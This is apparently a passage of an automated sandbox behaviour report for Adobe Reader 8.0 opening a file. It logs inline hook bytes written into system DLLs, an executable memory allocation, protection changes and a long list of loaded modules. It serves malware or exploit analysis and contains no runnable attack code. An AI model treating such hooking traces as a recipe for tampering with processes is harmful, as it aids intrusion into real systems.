PID Filepath Base Length Value Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0000 10 B8 35 00 00 00 E9 A9 D1 94 75 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 5 E9 A4 AE 6C 89 success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC000A 10 68 6C 02 00 00 E9 1E 63 95 75 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 5 E9 09 1F 6C 89 success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0014 10 8B FF 55 8B EC E9 A3 2E 25 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 5 E9 FD 4B DB 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC001E 10 8B FF 55 8B EC E9 7E 60 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 5 E9 6F 1A E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0028 10 8B FF 55 8B EC E9 94 E9 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 5 E9 A6 91 DF 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0032 10 8B FF 55 8B EC E9 8A 2F 25 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 5 E9 4B 4C DB 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC003C 10 8B FF 55 8B EC E9 4B 4D 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 5 E9 25 2F E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0046 10 8B FF 55 8B EC E9 9F 82 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 5 E9 0A FA DF 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0050 10 8B FF 55 8B EC E9 AB 90 23 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 5 E9 34 EC DC 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC005A 10 8B FF 55 8B EC E9 98 89 21 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 5 E9 8B F3 DE 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0064 12 6A 2C 68 10 7B 1C 77 E9 59 79 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 5 E9 F0 03 E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0070 10 8B FF 55 8B EC E9 DE 9B 23 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 5 E9 B4 E1 DC 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC007A 10 8B FF 55 8B EC E9 E5 8F 21 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 5 E9 BB ED DE 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0084 10 8B FF 55 8B EC E9 4F B1 1F 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 5 E9 5F CC E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC008E 10 8B FF 55 8B EC E9 98 3D AF 6A success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 5 E9 3E E9 51 94 success or wait 1 5FDF11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 116B0000 116AF8C8 page read and write success or wait 1 5FDA5EB
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 116B0000 116AF8CC page read and write success or wait 1 5FDA5EB
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0000 116AF4C0 page execute and read and write success or wait 1 5FE3FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 2FC00AE 1000 page execute and read and write page execute and read and write success or wait 1 2FC00C7
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 5FDF04F
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 5FE8879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2509752163
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2509756143
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 280000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2509759863
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 2A0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2509761223
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2F0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2509762347
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2509763099
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2509764418
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2509772835
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2509775636
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2509776941
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2509784165
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2509787375
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2509791696
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2509797671
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2509801664
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2509807056
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid success or wait 2509818565
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll Access: query and write and read and execute Type: image Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2509822618
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid object name not found 2509831112
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2509832686
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 460000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2509914609
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2509936720
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2509940615
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2509942659
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2509950231
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2509959019
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2509967305
Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2509968981
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2509981553
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2510030950
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2510033680
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2510035889
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 940000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2510061208
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 940000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2510125291
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2510128030
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3F0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2510140127
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2510143049
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2510145525
Section loaded Path: \KnownDlls\AcroRd32.dll Access: write and read and execute Type: unknown Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2510223187
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.dll Access: query and write and read and execute Type: image Baseaddress: 960000 Size: 14249984 Protection: read write Mapped to pid: own pid conflicting addresses 2510224761
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2510516726
Section loaded Path: \KnownDlls\AGM.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2510521858
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AGM.dll Access: query and write and read and execute Type: image Baseaddress: 6000000 Size: 4939776 Protection: read write Mapped to pid: own pid success or wait 2510523506
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2510551498
Section loaded Path: \KnownDlls\CoolType.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2510564942
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\CoolType.dll Access: query and write and read and execute Type: image Baseaddress: 8000000 Size: 2334720 Protection: read write Mapped to pid: own pid success or wait 2510566625
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 8000000 Size: 2334720 Protection: read write Mapped to pid: own pid object name not found 2510607963
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2510609741
Section loaded Path: \KnownDlls\BIB.dll Access: write and read and execute Type: unknown Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid object name not found 2510616547
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\BIB.dll Access: query and write and read and execute Type: image Baseaddress: 7000000 Size: 106496 Protection: read write Mapped to pid: own pid success or wait 2510618177
Section loaded Path: \KnownDlls\ACE.dll Access: write and read and execute Type: unknown Baseaddress: 7000000 Size: 106496 Protection: read write Mapped to pid: own pid object name not found 2510643306
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\ACE.dll Access: query and write and read and execute Type: image Baseaddress: 5000000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2510645023
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 17D0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2510797096
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 17D0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2510957430
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2510960418
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2510971511
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 17E0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2510981074
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1920000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2510991982
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 1920000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 2510995825
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1920000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2511000345
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 1920000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 2511003659
Section loaded Path: \KnownDlls\apphelp.dll Access: write and read and execute Type: unknown Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2511006724
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 1920000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2511048419
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 1920000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 2511064734
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1930000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2511067907
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 2511071184
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 1930000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2511095219
Section loaded Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: 1930000 Size: 1208320 Protection: readonly Mapped to pid: own pid object name not found 2511224415
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2511227036
Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 1B30000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 2512226845
Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 1B30000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 2512273896
Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 1B30000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 2512275719
Section loaded Path: \KnownDlls\Accessibility.api Access: write and read and execute Type: unknown Baseaddress: 1B30000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 2512385206
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and write and read and execute Type: image Baseaddress: 29800000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 2512392004
Section loaded Path: \KnownDlls\AcroForm.api Access: write and read and execute Type: unknown Baseaddress: 29800000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 2512741330
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and write and read and execute Type: image Baseaddress: 20800000 Size: 9744384 Protection: read write Mapped to pid: own pid success or wait 2512752040
Section loaded Path: \KnownDlls\USP10.dll Access: write and read and execute Type: unknown Baseaddress: 20800000 Size: 9744384 Protection: read write Mapped to pid: own pid object name not found 2512857250
Section loaded Path: C:\WINDOWS\system32\usp10.dll Access: query and write and read and execute Type: image Baseaddress: 74D90000 Size: 438272 Protection: read write Mapped to pid: own pid success or wait 2512859925
Section loaded Path: \KnownDlls\Annots.api Access: write and read and execute Type: unknown Baseaddress: 74D90000 Size: 438272 Protection: read write Mapped to pid: own pid object name not found 2513109076
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and write and read and execute Type: image Baseaddress: 22100000 Size: 4165632 Protection: read write Mapped to pid: own pid success or wait 2513114381
Section loaded Path: \KnownDlls\Checkers.api Access: write and read and execute Type: unknown Baseaddress: 22100000 Size: 4165632 Protection: read write Mapped to pid: own pid object name not found 2513431625
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and write and read and execute Type: image Baseaddress: 45800000 Size: 851968 Protection: read write Mapped to pid: own pid success or wait 2513436999
Section loaded Path: \KnownDlls\DigSig.api Access: write and read and execute Type: unknown Baseaddress: 45800000 Size: 851968 Protection: read write Mapped to pid: own pid object name not found 2513532211
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and write and read and execute Type: image Baseaddress: 23000000 Size: 1167360 Protection: read write Mapped to pid: own pid success or wait 2513536971
Section loaded Path: \KnownDlls\DVA.api Access: write and read and execute Type: unknown Baseaddress: 23000000 Size: 1167360 Protection: read write Mapped to pid: own pid object name not found 2513660777
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and write and read and execute Type: image Baseaddress: 40800000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2513664297
Section loaded Path: \KnownDlls\eBook.api Access: write and read and execute Type: unknown Baseaddress: 40800000 Size: 139264 Protection: read write Mapped to pid: own pid object name not found 2513750493
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and write and read and execute Type: image Baseaddress: 26800000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2513753982
Section loaded Path: \KnownDlls\EScript.api Access: write and read and execute Type: unknown Baseaddress: 26800000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 2513803157
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and write and read and execute Type: image Baseaddress: 23800000 Size: 1437696 Protection: read write Mapped to pid: own pid success or wait 2513807947
Section loaded Path: \KnownDlls\EWH32.api Access: write and read and execute Type: unknown Baseaddress: 23800000 Size: 1437696 Protection: read write Mapped to pid: own pid object name not found 2513931523
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and write and read and execute Type: image Baseaddress: 24000000 Size: 147456 Protection: read write Mapped to pid: own pid success or wait 2513935117
Section loaded Path: \KnownDlls\HLS.api Access: write and read and execute Type: unknown Baseaddress: 24000000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2513986845
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and write and read and execute Type: image Baseaddress: 31800000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2513990311
Section loaded Path: \KnownDlls\IA32.api Access: write and read and execute Type: unknown Baseaddress: 31800000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2514031568
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and write and read and execute Type: image Baseaddress: 25800000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2514035054
Section loaded Path: \KnownDlls\ImageViewer.API Access: write and read and execute Type: unknown Baseaddress: 25800000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2514076451
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and write and read and execute Type: image Baseaddress: 46800000 Size: 475136 Protection: read write Mapped to pid: own pid success or wait 2514081157
Section loaded Path: \KnownDlls\MakeAccessible.api Access: write and read and execute Type: unknown Baseaddress: 46800000 Size: 475136 Protection: read write Mapped to pid: own pid object name not found 2514195877
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and write and read and execute Type: image Baseaddress: 29000000 Size: 2273280 Protection: read write Mapped to pid: own pid success or wait 2514200663
Section loaded Path: \KnownDlls\Multimedia.api Access: write and read and execute Type: unknown Baseaddress: 29000000 Size: 2273280 Protection: read write Mapped to pid: own pid object name not found 2514302790
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and write and read and execute Type: image Baseaddress: 2D800000 Size: 1372160 Protection: read write Mapped to pid: own pid success or wait 2514307574
Section loaded Path: \KnownDlls\PDDom.api Access: write and read and execute Type: unknown Baseaddress: 2D800000 Size: 1372160 Protection: read write Mapped to pid: own pid object name not found 2514455902
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and write and read and execute Type: image Baseaddress: 2B800000 Size: 417792 Protection: read write Mapped to pid: own pid success or wait 2514459393
Section loaded Path: \KnownDlls\PPKLite.api Access: write and read and execute Type: unknown Baseaddress: 2B800000 Size: 417792 Protection: read write Mapped to pid: own pid object name not found 2514513279
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and write and read and execute Type: image Baseaddress: 28000000 Size: 5795840 Protection: read write Mapped to pid: own pid success or wait 2514517071
Section loaded Path: \KnownDlls\ReadOutLoud.api Access: write and read and execute Type: unknown Baseaddress: 28000000 Size: 5795840 Protection: read write Mapped to pid: own pid object name not found 2514813698
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and write and read and execute Type: image Baseaddress: 29A00000 Size: 122880 Protection: read write Mapped to pid: own pid success or wait 2514817231
